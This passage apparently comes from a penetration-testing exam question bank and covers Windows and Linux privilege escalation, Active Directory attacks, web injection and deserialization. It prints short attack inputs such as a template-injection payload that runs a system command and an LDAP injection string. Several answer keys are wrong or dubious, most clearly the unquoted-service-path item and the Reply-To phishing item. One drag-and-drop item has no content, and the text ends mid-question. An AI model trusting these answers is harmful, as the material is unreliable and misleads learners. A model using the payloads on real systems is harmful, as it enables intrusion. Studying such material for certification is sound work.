Option A is wrong because 'sudo -u root' requires the www-data user to have sudo privileges configured in /etc/sudoers, which is not the case here; it would fail with a permission error. Option C is wrong because modifying the PATH environment variable alone does not exploit CVE-2021-4034; the vulnerability requires specific crafted environment variables (like GCONV_PATH) to trigger the out-of-bounds write in pkexec, not just PATH manipulation. Option D is wrong because using a generic kernel exploit is unnecessary when a specific, reliable exploit for the known vulnerable pkexec binary exists; generic kernel exploits may also fail due to kernel version mismatches or security mitigations.

41
MCQ · medium

A penetration tester has gained low-privilege access on a Windows 10 machine. The tester discovers that a service runs with SYSTEM privileges and has the following binary path: C:\Program Files\MyApp\service.exe. The path is unquoted. Which exploitation technique is most likely to allow the tester to escalate privileges?

A. Create a malicious executable named 'C:\Program.exe' and place it in the root of C:.
B. Create a malicious executable named 'MyApp.exe' and place it in C:\Program Files\.
C. Modify the service's binary path in the registry to point to a malicious executable.
D. Use SeImpersonatePrivilege to impersonate the SYSTEM account and directly modify the service.
Answer: B

Correct. Because the service path is unquoted, Windows will first try to execute 'C:\Program.exe', but that does not exist. It then tries 'C:\Program Files\MyApp.exe'. If the tester can write to 'C:\Program Files\', they can place a malicious 'MyApp.exe' there. When the service starts, it will run the malicious executable with SYSTEM privileges.

Why this answer

The unquoted service binary path 'C:\Program Files\MyApp\service.exe' allows Windows to interpret spaces as separators, so it will attempt to execute 'C:\Program.exe' first, then 'C:\Program Files\MyApp.exe', and finally the intended path. By placing a malicious 'MyApp.exe' in 'C:\Program Files\', the tester exploits the space in 'Program Files' to hijack execution before the legitimate service.exe runs, achieving privilege escalation to SYSTEM.

Exam trap

The trap here is that candidates may assume the exploit requires placing an executable at the root (C:\Program.exe) or modifying the registry, but the correct technique exploits the space in 'Program Files' by placing the malicious binary in that directory, not at the root.

How to eliminate wrong answers

Option A is wrong because, although Windows does try 'C:\Program.exe' first when resolving the unquoted path, the intended exploitation point in this scenario is the space in 'Program Files', not the root of C:. Option C is wrong because modifying the service's binary path in the registry requires administrative privileges to edit the service configuration, which the tester does not have with low-privilege access. Option D is wrong because SeImpersonatePrivilege allows token impersonation but does not grant direct modification of a service's binary path; it is used for techniques like token theft or potato attacks, not for unquoted service path exploitation.

42
Multi-Select · hard

Which THREE of the following are common techniques used to evade antivirus (AV) detection of post-exploitation tools? (Choose three.)

A. Obfuscate the payload code
B. Pack the executable with a crypter
C. Use encrypted communication channels
D. Enable SMB file sharing
E. Apply the latest Windows patches
Answers: A, B, C

Obfuscation changes the code pattern to avoid signature detection.

Why this answer

Obfuscating the payload code transforms the malicious code into a different representation (e.g., XOR encoding, Base64, or custom encryption) that does not match known AV signatures. AV engines rely on static signature matching, so by altering the byte sequence without changing the payload's functionality, the tool evades signature-based detection. This is a fundamental technique used in frameworks like Metasploit with its 'shikata_ga_nai' encoder.

Exam trap

The trap here is that candidates confuse system hardening or network configuration changes (like SMB sharing or patching) with active evasion techniques, when in fact only code transformation and communication encryption directly hide the malicious tool from AV.

43
Multi-Select · easy

Which THREE of the following are examples of privilege escalation techniques on Linux systems? (Select THREE.)

A. Exploiting kernel vulnerabilities
B. Exploiting SUID binary vulnerabilities
C. Token manipulation
D. Sudo misconfiguration exploitation
E. Pass-the-hash
Answers: A, B, D

Kernel exploits can grant root-level access.

Why this answer

Exploiting kernel vulnerabilities (Option A) is a privilege escalation technique because the Linux kernel operates with the highest system privileges (ring 0). A vulnerability in the kernel, such as a use-after-free or race condition in a syscall handler, can allow an attacker to execute arbitrary code with kernel-level privileges, effectively gaining root access. Common examples include the Dirty Cow (CVE-2016-5195) vulnerability, which exploited a race condition in the memory subsystem to achieve local privilege escalation.

Exam trap

CompTIA often tests the distinction between Windows-specific and Linux-specific privilege escalation techniques, so the trap here is that candidates may mistakenly apply Windows concepts like token manipulation or pass-the-hash to Linux environments, where they are not valid.

44
MCQ · medium

A penetration tester has gained access to a Windows domain and wants to perform a Kerberoasting attack. Which account privileges are required to request service tickets for Kerberoasting?

A. Domain Admin
B. Any domain user
C. Local Administrator on the domain controller
D. Enterprise Admin
Answer: B

Any authenticated user in the domain can request service tickets, making Kerberoasting a low-privilege attack vector.

Why this answer

Kerberoasting exploits the Kerberos protocol's TGS-REP step, where any domain user can request a service ticket for any service principal name (SPN) in Active Directory. The domain controller returns the ticket encrypted with the service account's NTLM hash, which the attacker can then crack offline. No special privileges beyond being a valid domain user are required because the TGS request is part of normal Kerberos authentication.

Exam trap

Cisco often tests the misconception that Kerberoasting requires administrative privileges, when in fact any authenticated domain user can request service tickets because the Kerberos protocol does not enforce authorization checks at the TGS request stage.

How to eliminate wrong answers

Option A is wrong because Domain Admin privileges are not needed; Kerberoasting only requires the ability to authenticate to the domain, and Domain Admin is an overprivileged role that would expose the attacker to more detection. Option C is wrong because Local Administrator on the domain controller is irrelevant; the attack does not require local administrative access to any machine, as the TGS request is made over the network to the domain controller. Option D is wrong because Enterprise Admin is a forest-wide administrative role; Kerberoasting can be performed by any authenticated domain user without any elevated group membership.

45
MCQ · hard

During a penetration test, a tester identifies a buffer overflow vulnerability in a Linux binary that has both ASLR and NX (Non-Executable) enabled. The tester discovers a ROP gadget at a fixed address in a library that is not affected by ASLR. Which technique can be used to exploit this vulnerability and achieve code execution?

A. Heap spraying to predict memory layout and inject shellcode
B. Return-oriented programming (ROP) using the fixed gadgets
C. Stack canary bypass using information leak
D. Format string attack to overwrite GOT entries
Answer: B

ROP uses fixed gadgets to create a chain that bypasses NX and, with fixed addresses, can also bypass ASLR.

Why this answer

Return-oriented programming (ROP) is the correct technique because ASLR and NX are both enabled, preventing direct shellcode execution and making memory addresses unpredictable. However, the tester found a ROP gadget at a fixed address in a library not affected by ASLR, allowing the construction of a chain of gadgets to achieve arbitrary code execution without needing to inject or execute shellcode on the stack.

Exam trap

The trap here is that candidates may choose heap spraying (Option A) thinking it bypasses ASLR, but they forget that NX still blocks shellcode execution, making ROP the only viable technique when fixed gadgets are available.

How to eliminate wrong answers

Option A is wrong because heap spraying is used to increase the predictability of heap memory layout for exploiting use-after-free or heap-based vulnerabilities, but it does not bypass NX (which prevents shellcode execution) and does not leverage fixed-address ROP gadgets. Option C is wrong because a stack canary bypass using an information leak addresses stack smashing protection but does not overcome NX or ASLR; it would still require a method to execute code, which ROP provides. Option D is wrong because a format string attack can overwrite GOT entries to redirect execution, but it does not inherently bypass NX or ASLR unless combined with other techniques, and the question specifies that a fixed-address ROP gadget is available, making ROP the direct and intended approach.

46
MCQ · medium

A penetration tester gained low-privileged access to a Linux server and found that the user can run a custom script located at /opt/tool/backup.sh with setuid root. The script begins with a hashbang #!/bin/bash and uses an internal variable defined as BASEDIR=$(dirname $0) to determine paths. Which technique is most likely to allow privilege escalation?

A. Modify the $0 variable during execution
B. Create a malicious executable named 'dirname' in a directory earlier in the PATH
C. Overwrite /opt/tool/backup.sh with a reverse shell
D. Exploit a buffer overflow in the Bash interpreter
Answer: B

Since the script uses $(dirname $0) without an absolute path, the system searches PATH for 'dirname'. If the attacker puts a malicious 'dirname' script in a writable directory earlier in PATH, it will be executed as root.

Why this answer

Option B is correct because the script uses `BASEDIR=$(dirname $0)` to resolve paths. If the user can place a malicious executable named `dirname` earlier in the PATH than the legitimate `/usr/bin/dirname`, then when the script runs with setuid root, the shell will execute the attacker's `dirname` binary instead, allowing arbitrary code execution as root.

Exam trap

The trap here is that candidates may focus on modifying `$0` (Option A) or overwriting the script (Option C), but the actual vulnerability lies in the insecure use of a relative command (`dirname`) within a setuid script, which allows PATH hijacking.

How to eliminate wrong answers

Option A is wrong because the `$0` variable is set by the shell to the script's path (e.g., `/opt/tool/backup.sh`) and cannot be modified by the user during execution; it is read-only in this context. Option C is wrong because the user has only low-privileged access and cannot overwrite `/opt/tool/backup.sh` (owned by root) without already having root privileges. Option D is wrong because there is no indication of a buffer overflow vulnerability in the Bash interpreter; the script is a simple shell script, and the attack vector is PATH hijacking, not memory corruption.

47
MCQ · hard

During an internal penetration test, a tester gains a shell as the 'www-data' user on a Linux server. The server runs a PHP web application that connects to a PostgreSQL database using credentials stored in a config file. The tester discovers that the PostgreSQL server trusts all local connections (no password required) and that the web application's database user has the 'CREATEFUNC' privilege. Which technique is most effective for escalating privileges to database administrator (superuser) and executing system commands as the database service account?

A. Use the stored credentials to log in as the web application user and run SELECT * FROM pg_shadow; to extract password hashes of other users.
B. Create a PostgreSQL function using a trusted language like Python or Perl that executes arbitrary system commands, then run it.
C. Exploit a kernel vulnerability to gain root access and then dump the database files.
D. Use the 'sudo' command to switch to the postgres user if the www-data user has sudo privileges.
Answer: B

This technique leverages CREATEFUNC to run shell commands as the database service account, enabling privilege escalation.

Why this answer

Option B is correct because the 'CREATEFUNC' privilege allows the web application database user to create user-defined functions in PostgreSQL. By creating a function in a trusted language (e.g., Python, Perl, or C) that executes arbitrary system commands, the tester can run those commands with the privileges of the database service account (e.g., 'postgres'), effectively escalating to superuser-level control and executing system commands without needing a password.

Exam trap

The trap here is that candidates may overlook the direct power of 'CREATEFUNC' in PostgreSQL and instead focus on password extraction (Option A) or generic kernel exploits (Option C), missing that database-level function creation is the most efficient and immediate escalation path.

How to eliminate wrong answers

Option A is wrong because querying pg_shadow extracts password hashes but does not directly escalate to superuser or execute system commands; it only provides hashes that would need to be cracked, and the web application user already has CREATEFUNC, making function creation a more direct path. Option C is wrong because exploiting a kernel vulnerability is unnecessary and less efficient; the tester already has a shell and can leverage database privileges to escalate without kernel exploits. Option D is wrong because the 'sudo' command requires the www-data user to have specific sudo privileges (e.g., to run commands as postgres), which is not indicated in the scenario; the tester has no evidence of sudo access.

48
MCQ · medium

A penetration tester with a low-privileged domain user account performs a Kerberoasting attack. What is the primary goal of this attack?

A. Obtain the NTLM hash of the krbtgt account.
B. Obtain a list of all domain users.
C. Obtain a Kerberos ticket that can be used to impersonate a domain admin.
D. Obtain the plaintext password of a user account with a Service Principal Name (SPN).
Answer: D

Kerberoasting requests TGS tickets for SPN-linked accounts. These tickets can be cracked offline to reveal the password, potentially granting higher privileges if the account has administrative rights.

Why this answer

Kerberoasting targets service accounts that have a Service Principal Name (SPN) registered in Active Directory. The attacker requests a Kerberos service ticket (TGS) for the SPN, which is encrypted with the service account's NTLM hash. The attacker then cracks this hash offline to recover the plaintext password, enabling lateral movement or privilege escalation.

Exam trap

CompTIA often tests the misconception that Kerberoasting directly yields a domain admin ticket or a TGT, when in fact it only provides a service ticket that must be cracked offline to recover the plaintext password of the service account.

How to eliminate wrong answers

Option A is wrong because the krbtgt account's NTLM hash is used to sign Kerberos Ticket-Granting Tickets (TGTs), not service tickets; obtaining it requires a different attack like a Golden Ticket or DCSync. Option B is wrong because listing domain users is typically done via LDAP queries (e.g., enum4linux, ldapsearch) and is not the goal of Kerberoasting, which focuses on cracking service account passwords. Option C is wrong because Kerberoasting yields a TGS for a specific service, not a TGT; impersonating a domain admin would require a TGT or a forged ticket (e.g., Silver Ticket), not a service ticket for a single SPN.

49
MCQ · medium

A penetration tester has gained a foothold on a Windows server and wants to move laterally to a domain controller. The tester has access to a service account that is a member of the 'Remote Management Users' group on the domain controller. Which of the following tools would be MOST appropriate for lateral movement in this scenario?

A. PsExec
B. MS16-075 exploit
C. WinRM
D. BloodHound
Answer: C

Correct. WinRM is designed for remote management and the account's group membership makes it usable for lateral movement.

Why this answer

WinRM (Windows Remote Management) is the most appropriate tool because the tester's service account is a member of the 'Remote Management Users' group on the domain controller, which grants explicit permission to connect via WinRM over HTTP/HTTPS (ports 5985/5986). This allows direct PowerShell remoting or winrs execution for lateral movement without requiring administrative privileges or additional exploits.

Exam trap

The trap here is that candidates often assume PsExec is the universal lateral movement tool, but it requires administrative privileges, whereas WinRM is specifically permitted by the 'Remote Management Users' group membership described in the scenario.

How to eliminate wrong answers

Option A is wrong because PsExec requires administrative privileges (typically local admin or domain admin) on the target system to execute services remotely, and membership in 'Remote Management Users' does not grant the necessary admin rights. Option B is wrong because MS16-075 is a local privilege escalation exploit (leveraging SeImpersonatePrivilege) that allows a low-privileged user to impersonate SYSTEM; it is not a lateral movement tool and does not leverage Remote Management Users group membership.

50
MCQ · medium

During a web application test, a penetration tester suspects an LDAP injection vulnerability. The application uses user input to dynamically construct an LDAP query. The tester submits the following payload in the username field: 'admin)(&)'. The application returns a list of all users instead of the expected single user. Which of the following best describes the reason this payload was effective?

A. The payload causes an LDAP error that triggers a fallback to list all users.
B. The payload modifies the base DN to search the entire directory.
C. The payload introduces a logical OR that negates the original condition.
D. The payload closes the original filter and appends a tautology that returns all objects.
Answer: D

The correct interpretation: by closing the original filter with ')' and injecting '(&)', the tester creates a condition that is always true, causing the query to return all directory objects.

Why this answer

Option D is correct because the payload 'admin)(&)' closes the original LDAP filter after 'admin' and appends '(&)' which is a tautology (always true). This causes the LDAP query to match all directory objects, returning the full user list instead of a single user. The attack exploits the way LDAP filters are parsed: injecting a closing parenthesis and a new filter that evaluates to true for every entry.

Exam trap

The trap here is that candidates confuse the LDAP injection payload with SQL injection patterns, mistakenly thinking the '&' operator creates an OR condition, when in LDAP prefix notation '&' is an AND operator and the tautology works by appending an always-true filter, not by negating the original condition.

How to eliminate wrong answers

Option A is wrong because the payload does not cause an LDAP error; it successfully modifies the filter syntax to return all users, not a fallback behavior. Option B is wrong because the payload does not alter the base DN (distinguished name) of the search; it only manipulates the filter component of the query. Option C is wrong because the payload introduces a logical AND (the '&' operator) which is a conjunction, not a logical OR; the tautology makes the entire filter true, not by negating the original condition but by appending an always-true clause.

51
MCQ · medium

A penetration tester has compromised a Windows workstation and obtained a low-privileged domain user account. The tester discovers that this user belongs to a group that has the 'GenericWrite' privilege over a computer object in Active Directory. Which attack is most directly enabled by this misconfiguration?

A. Kerberoasting
B. Shadow Credentials
C. AS-REP Roasting
D. DCSync Attack
Answer: B

With GenericWrite over a computer object, the tester can write to the msDS-KeyCredentialLink attribute to add a rogue key credential, enabling a Shadow Credentials attack to request a TGT for the computer account.

Why this answer

The 'GenericWrite' privilege over a computer object allows the attacker to write to the msDS-KeyCredentialLink attribute of that object. By adding a rogue key credential, the attacker can trigger the Key Distribution Center (KDC) to accept a certificate-based authentication, enabling the Shadow Credentials attack to obtain a TGT for the computer account and escalate privileges.

Exam trap

The trap here is that candidates confuse the GenericWrite privilege with the ability to perform Kerberoasting or AS-REP Roasting, but those attacks require different preconditions (SPN or no pre-authentication) and do not directly exploit write access to computer object attributes.

How to eliminate wrong answers

Option A is wrong because Kerberoasting requires the attacker to have a valid TGT for a domain user and targets service accounts with SPNs, not computer objects with GenericWrite. Option C is wrong because AS-REP Roasting targets user accounts that do not require Kerberos pre-authentication, not computer objects, and does not leverage GenericWrite over an object.

52
MCQ · easy

During a penetration test, a tester needs to perform a man-in-the-middle attack on a network that uses WPA2-Enterprise with PEAP. Which tool is most appropriate for capturing the authentication handshake to attempt offline cracking?

A. Wireshark
B. aircrack-ng
C. Ettercap
D. hostapd-wpe
Answer: D

hostapd-wpe sets up a rogue access point that captures EAP credentials for offline cracking.

Why this answer

hostapd-wpe (Wireless Pwnage Edition) is specifically designed to set up a rogue access point that impersonates a legitimate WPA2-Enterprise network. It captures the MSCHAPv2 challenge-response from the PEAP authentication handshake, which can then be used for offline dictionary or brute-force attacks against the user's credentials. Unlike other tools, hostapd-wpe handles the full EAP/PEAP exchange required for this attack.

Exam trap

The trap here is that candidates often confuse aircrack-ng's ability to capture WPA2-PSK handshakes with the different requirements of WPA2-Enterprise, where the attack targets the MSCHAPv2 credentials rather than the 4-way handshake.

How to eliminate wrong answers

Option A is wrong because Wireshark is a packet analyzer that can capture traffic but cannot perform a man-in-the-middle attack or initiate an authentication handshake; it lacks the ability to set up a rogue AP. Option B is wrong because aircrack-ng is used for cracking WPA/WPA2-PSK (pre-shared key) handshakes, not WPA2-Enterprise with PEAP, which uses EAP-MSCHAPv2 and requires a different attack vector. Option C is wrong because Ettercap is a network sniffing and MITM tool for LAN-based attacks (e.g., ARP spoofing), but it does not support 802.11 wireless rogue AP setup or EAP/PEAP handshake capture.

53
MCQ · hard

A penetration tester is exploiting a Linux system that has ASLR enabled but no stack canaries. The vulnerability is a classic stack-based buffer overflow. Which of the following is the most effective method to achieve code execution?

A. Prepend a NOP sled and inject shellcode into the buffer
B. Return-to-libc (ret2libc)
C. Return to the PLT entry for system()
D. Use a ROP chain to bypass ASLR and execute shellcode
Answer: C

The PLT (Procedure Linkage Table) address is not randomized by ASLR, allowing reliable calls to library functions.

Why this answer

Option C is correct because with ASLR enabled, direct shellcode injection fails due to randomized stack addresses, but the PLT entry for system() has a fixed, known address in the binary. Since there are no stack canaries, a simple buffer overflow can overwrite the return address to jump directly to system() in the PLT, passing a pointer to a command string (e.g., "/bin/sh") already in memory, achieving code execution without needing to know runtime addresses.

Exam trap

The trap here is that candidates assume ASLR always prevents code execution, but they overlook that PLT entries have fixed addresses in the binary, making ret2plt a viable bypass when no stack canaries are present.

How to eliminate wrong answers

Option A is wrong because ASLR randomizes the stack base address, making it impossible to reliably predict where the NOP sled and shellcode reside, so the overwritten return address will likely point to an invalid location. Option B is wrong because return-to-libc typically requires knowing the runtime address of libc functions, which is randomized by ASLR; the PLT entry is a better target as it is resolved at load time and has a fixed address in the binary. Option D is wrong because a ROP chain can bypass ASLR only if you can leak a runtime address first (e.g., via an info leak), which is not provided in this scenario; without a leak, ROP cannot reliably locate gadgets in randomized memory regions.

54
MCQhard

A penetration tester has gained a low-privileged shell on a Linux server and discovers a binary with the SUID bit set owned by root. The binary executes a system command using a relative path without sanitizing user input. Which of the following techniques would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability to gain root
B.Modify the PATH environment variable to point to a malicious script with the same name as the command called by the binary
C.Impersonate the root user using sudo
D.Preload a shared library using LD_PRELOAD
AnswerB

PATH hijacking leverages the SUID binary's use of a relative path; by placing a malicious executable earlier in PATH, the binary executes it with root privileges.

Why this answer

Option B is correct because the SUID binary executes a system command using a relative path without sanitizing user input. By modifying the PATH environment variable to include a directory containing a malicious script with the same name as the command, the tester can cause the binary to execute the attacker-controlled script instead of the intended system command, thereby escalating privileges to root when the SUID binary runs.

Exam trap

The trap here is that candidates may think kernel exploitation (Option A) is always the go-to for privilege escalation, but the question specifically describes a misconfigured SUID binary with a relative path and unsanitized input, making PATH hijacking the most direct and likely technique.

How to eliminate wrong answers

Option A is wrong because exploiting a kernel vulnerability is a different technique that does not leverage the specific misconfiguration of the SUID binary with a relative path and unsanitized input; it would be used if no such binary existed or if kernel exploits were available, but the question explicitly describes a binary that can be exploited via PATH hijacking. Option C is wrong because impersonating the root user using sudo requires the tester to already have sudo privileges or know the root password, which is not the case here; the tester has a low-privileged shell and cannot simply use sudo without proper authorization.

55
MCQmedium

A penetration tester is performing a social engineering campaign against a client. The tester wants to send a phishing email that bypasses the email security gateway and appears to come from an internal source. Which technique is most effective?

A.Set the Reply-To address to an attacker-controlled email
B.Insert a custom email header that mimics internal mail
C.Use a URL shortener to hide the malicious link
D.Register a similar domain and spoof the display name
AnswerA

This bypasses gateways because the sender appears legitimate, but replies go to the attacker.

Why this answer

Setting the Reply-To address to an attacker-controlled email is the most effective technique because many email security gateways (ESGs) perform SPF, DKIM, and DMARC validation on the SMTP envelope sender (Return-Path) but do not validate the Reply-To header. By spoofing the From address to an internal user and setting Reply-To to an attacker-controlled address, replies bypass the ESG's authentication checks while the email appears to come from an internal source, increasing the likelihood of user interaction.

Exam trap

The trap here is that candidates often confuse the Reply-To header with the From header, assuming that setting the Reply-To address is equivalent to spoofing the sender, when in fact the ESG's authentication checks focus on the From and envelope sender, not the Reply-To, making this a subtle but effective bypass.

How to eliminate wrong answers

Option B is wrong because inserting a custom email header that mimics internal mail does not bypass SPF/DKIM/DMARC validation; the ESG still checks the SMTP envelope sender and the From header against DNS records, so the email will likely be rejected or flagged. Option C is wrong because using a URL shortener hides the malicious link but does not address the ESG's authentication checks on the sender domain; the email still fails SPF/DKIM/DMARC if the From domain is spoofed, and many ESGs now block or sandbox shortened URLs. Option D is wrong because registering a similar domain and spoofing the display name only bypasses human inspection, not the ESG's automated checks; the ESG will still validate the actual domain in the From header against SPF/DKIM/DMARC records, and the similar domain will fail unless it is also configured with proper authentication records.

56
MCQhard

A penetration tester has discovered a local file inclusion (LFI) vulnerability in a PHP web application. The vulnerable code uses the following pattern: include($_GET['page']);. The application runs on a Linux server with Apache and PHP. The tester wants to achieve remote code execution (RCE). Which technique is most likely to succeed given this LFI?

A.Use the php://input wrapper and send PHP code in the POST body.
B.Use the file:// wrapper to read sensitive files like /etc/passwd.
C.Use the data:// wrapper with a base64-encoded PHP payload.
D.Set allow_url_include to On in php.ini via the LFI.
AnswerA

php://input reads the raw POST data. When included, the PHP interpreter will execute any code contained in the POST body. This is a common technique to turn LFI into RCE, and it does not require allow_url_include to be enabled.

Why this answer

The correct technique is to use the php://input wrapper because it allows the attacker to pass arbitrary PHP code in the HTTP POST body, which the include() function will execute as PHP. Since the vulnerable code directly includes user input without sanitization, the php://input stream reads the raw POST data and processes it as a PHP script, achieving remote code execution.

Exam trap

The trap here is that candidates often assume data:// is the most direct way to inject code, but they overlook that php://input is more reliable because it does not require allow_url_include to be enabled, which is a common security hardening measure.

How to eliminate wrong answers

Option B is wrong because the file:// wrapper only reads local files and does not allow code execution; it would only read sensitive files like /etc/passwd, not achieve RCE. Option C is wrong because while the data:// wrapper can execute PHP code if the allow_url_include directive is enabled, it is often disabled by default in modern PHP configurations, making it less reliable than php://input, which is more commonly available and does not require allow_url_include to be enabled for this purpose.

57
MCQmedium

A penetration tester is testing a web application that has input validation blocking single quotes. The tester wants to perform a SQL injection attack. Which of the following techniques would be MOST effective to bypass the filter?

A.Using URL encoding for the single quote (%27)
B.Using double quotes instead of single quotes
C.Using a second-order SQL injection
D.Using a payload without quotes, such as numeric injection
AnswerD

If the input is used in a numeric context (e.g., WHERE id=5), quoting is not needed, allowing injection without single quotes.

Why this answer

Option D is correct because numeric injection does not require quotes at all, directly bypassing the single-quote filter. When the vulnerable parameter expects a numeric value (e.g., an ID), the tester can inject SQL logic like `OR 1=1` without any quotes, making it the most effective technique against input validation that blocks single quotes.

Exam trap

The trap here is that candidates often assume URL encoding or alternative quote characters will bypass the filter, but they overlook that the filter operates on the decoded input or that SQL syntax strictly requires single quotes for string delimiters.

How to eliminate wrong answers

Option A is wrong because URL encoding (%27) is typically decoded by the web server before the input reaches the application, so the filter still sees the single quote and blocks it. Option B is wrong because double quotes are not interchangeable with single quotes in SQL; string literals in SQL (e.g., MySQL, PostgreSQL) require single quotes, so double quotes would not close the string and would likely cause a syntax error or be treated as identifiers. Option C is wrong because second-order SQL injection relies on storing malicious input (often containing quotes) in the database and later executing it; the initial injection still needs to bypass the filter to store the payload, so it does not solve the immediate problem of the single-quote filter.

58
MCQeasy

A penetration tester is using a vulnerability scanner that reports a 'Critical' severity for an 'SMBv1 vulnerability' on a Windows server. Which of the following is the correct remediation recommendation?

A.Apply the latest Windows security patches
B.Disable SMBv1 on the server
C.Enable SMB signing
D.Enable SMB encryption
AnswerB

Disabling the insecure protocol is the most effective remediation.

Why this answer

The correct remediation for an SMBv1 vulnerability is to disable SMBv1 on the server. SMBv1 is a legacy protocol that lacks modern security features and is known to be targeted by exploits such as EternalBlue (used by WannaCry). Disabling SMBv1 eliminates the attack surface without affecting SMBv2 or SMBv3, which are secure and still functional.

Exam trap

The trap here is that candidates assume patching (Option A) is sufficient for all vulnerabilities, but for SMBv1, the protocol itself is deprecated and must be disabled rather than just patched.

How to eliminate wrong answers

Option A is wrong because applying the latest Windows security patches only addresses specific CVEs but does not remove the inherently insecure SMBv1 protocol; patches can be bypassed or incomplete, whereas disabling SMBv1 is the definitive fix. Option C is wrong because enabling SMB signing provides integrity and authentication for SMB traffic but does not mitigate the SMBv1 protocol's fundamental vulnerabilities, such as buffer overflow exploits. Option D is wrong because enabling SMB encryption protects data in transit but does not disable or patch the SMBv1 protocol itself, leaving the server still vulnerable to SMBv1-specific attacks.

59
MCQhard

During an internal test, a penetration tester discovers a web application that is vulnerable to Server-Side Template Injection (SSTI). The application uses a template engine that does not sandbox user input. Which of the following payloads would be MOST effective to achieve remote code execution on the server?

A.{{7*7}}
B.<script>alert('xss')</script>
C.${7*7}
D.{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
AnswerD

This payload exploits Python object chaining to execute system commands, achieving remote code execution.

Why this answer

Option D is correct because it exploits Python's object model to access the `os` module via `__class__.__init__.__globals__`, bypassing the template engine's lack of sandboxing. This allows the attacker to execute arbitrary system commands like `id` on the server, achieving remote code execution (RCE). The payload is specific to Jinja2 or similar Python-based template engines that expose built-in objects.

Exam trap

The trap here is that candidates confuse SSTI with simple template injection tests (like `{{7*7}}`) or XSS, failing to recognize that the correct payload must chain object introspection to access system commands for RCE.

How to eliminate wrong answers

Option A is wrong because `{{7*7}}` is a simple math expression that only tests for SSTI vulnerability (returning 49) but does not achieve RCE. Option B is wrong because `<script>alert('xss')</script>` is a Cross-Site Scripting (XSS) payload, not an SSTI payload, and it targets client-side execution, not server-side RCE. Option C is wrong because `${7*7}` is a Java Expression Language (EL) injection syntax, not applicable to Python-based template engines; it would not execute in a Jinja2 context and does not lead to RCE.

60
Drag & Dropmedium

Drag and drop the steps to perform a password cracking attack using John the Ripper into the correct order.

Why this order

Password cracking requires hash acquisition, type identification, running the tool, and using results for further attacks.

61
MCQmedium

A penetration tester is performing a man-in-the-middle attack on a network using ARP spoofing. What is the primary purpose of ARP spoofing?

A.To assign a fake IP address to the attacker's device
B.To associate the attacker's MAC address with the IP address of a legitimate host
C.To modify the routing table of the target
D.To poison the DNS cache of the target
AnswerB

This redirects traffic destined for that IP to the attacker.

Why this answer

ARP spoofing works by sending forged ARP replies to associate the attacker's MAC address with the IP address of a legitimate host (e.g., the default gateway). This causes traffic destined for that IP to be sent to the attacker instead, enabling interception and manipulation of network communications.

Exam trap

The trap here is that candidates confuse ARP spoofing with IP address spoofing or DNS poisoning, but the exam specifically tests that ARP spoofing manipulates MAC-to-IP mappings at Layer 2, not IP addresses or higher-layer caches.

How to eliminate wrong answers

Option A is wrong because ARP spoofing does not assign a fake IP to the attacker; the attacker retains their own IP and instead manipulates the IP-to-MAC mapping on other hosts. Option C is wrong because ARP spoofing operates at Layer 2 (Data Link) and does not modify routing tables, which are Layer 3 constructs managed by protocols like RIP or OSPF. Option D is wrong because DNS cache poisoning targets the DNS resolver's cache (Layer 7), whereas ARP spoofing targets the ARP cache (Layer 2) to redirect traffic at the network access layer.

62
MCQhard

A penetration tester discovers that a web application uses a vulnerable Java deserialization endpoint. The classpath includes the Apache Commons Collections library. Which attack technique is most likely to achieve remote code execution?

A.Java deserialization of untrusted data (RCE via Commons Collections).
B.SQL injection.
C.Cross-site scripting.
D.Command injection.
AnswerA

The presence of Commons Collections provides known gadget chains (e.g., those implemented in ysoserial) that can achieve code execution during deserialization, making this the direct attack vector.

Why this answer

The correct answer is A because the presence of the Apache Commons Collections library in the classpath, combined with a vulnerable Java deserialization endpoint, enables the classic 'gadget chain' attack. Attackers craft a malicious serialized object that, when deserialized, invokes methods in Commons Collections (e.g., InvokerTransformer) to execute arbitrary system commands, achieving remote code execution (RCE). This is a well-documented exploit chain (e.g., CVE-2015-7501) that directly leverages the library's reflection-based classes.

Exam trap

The trap here is that candidates may confuse deserialization attacks with other input-based attacks like SQLi or XSS, failing to recognize that the specific vulnerability is the unsafe deserialization of Java objects using a known gadget library (Commons Collections) to achieve server-side RCE.

How to eliminate wrong answers

Option B is wrong because SQL injection targets database queries via input manipulation, not Java deserialization of objects; it does not exploit the deserialization endpoint or the Commons Collections library. Option C is wrong because cross-site scripting (XSS) injects client-side scripts into web pages, not server-side code execution via deserialization; it cannot achieve RCE through Java object deserialization.

63
MCQmedium

A penetration tester is attempting a pass-the-hash (PtH) attack against a Windows domain-joined machine. The tester has obtained the NTLM hash of a local administrator account. Which tool can be used directly to authenticate using the hash to gain remote command execution?

A.John the Ripper
B.Metasploit's psexec module
C.Mimikatz
D.Nmap
AnswerB

The psexec module in Metasploit allows authentication with a plaintext password or NTLM hash to execute commands on a remote Windows system via SMB.

Why this answer

Metasploit's psexec module (exploit/windows/smb/psexec) directly accepts an NTLM hash via the 'SMBPass' option and uses it to authenticate over SMB, then creates a service on the target to execute commands. This is a classic pass-the-hash technique against Windows systems, as the module leverages the SMB protocol and Windows service control manager without needing the plaintext password.

Exam trap

The trap here is that candidates confuse Mimikatz's ability to perform pass-the-hash locally (spawning a cmd.exe with the hash) with the ability to directly execute commands remotely, but Mimikatz requires additional tools like PsExec or WinRM to achieve remote execution, whereas Metasploit's psexec module is a single-step solution.

How to eliminate wrong answers

Option A is wrong because John the Ripper is a password cracking tool that attempts to recover plaintext passwords from hashes, not a tool that can directly authenticate using a hash for remote command execution. Option C is wrong because Mimikatz is primarily a credential extraction and manipulation tool that can perform pass-the-hash locally (e.g., via sekurlsa::pth) to spawn a process with the hash, but it does not directly provide remote command execution against a domain-joined machine without additional steps like scheduling a remote task or using PsExec.

64
MCQmedium

A penetration tester discovers a web application that deserializes user-controlled data without validation. The application uses Java serialization. The tester creates a malicious serialized object that executes a system command. Which of the following conditions is required for this exploit to succeed?

A.The application must be running with root privileges
B.The application must use a custom ClassLoader
C.The Java runtime must have a gadget chain available in its classpath
D.The application must be running on a Windows operating system
AnswerC

Gadget chains like those in Apache Commons Collections are necessary to transform deserialization into code execution.

Why this answer

Java deserialization exploits rely on the presence of specific classes (gadget chains) in the application's classpath that can be chained together to achieve arbitrary code execution. The attacker crafts a serialized object that, when deserialized, triggers a sequence of method calls (gadget chain) that ultimately executes a system command. Without a suitable gadget chain available in the classpath, the deserialization of a malicious object will not lead to code execution.

Exam trap

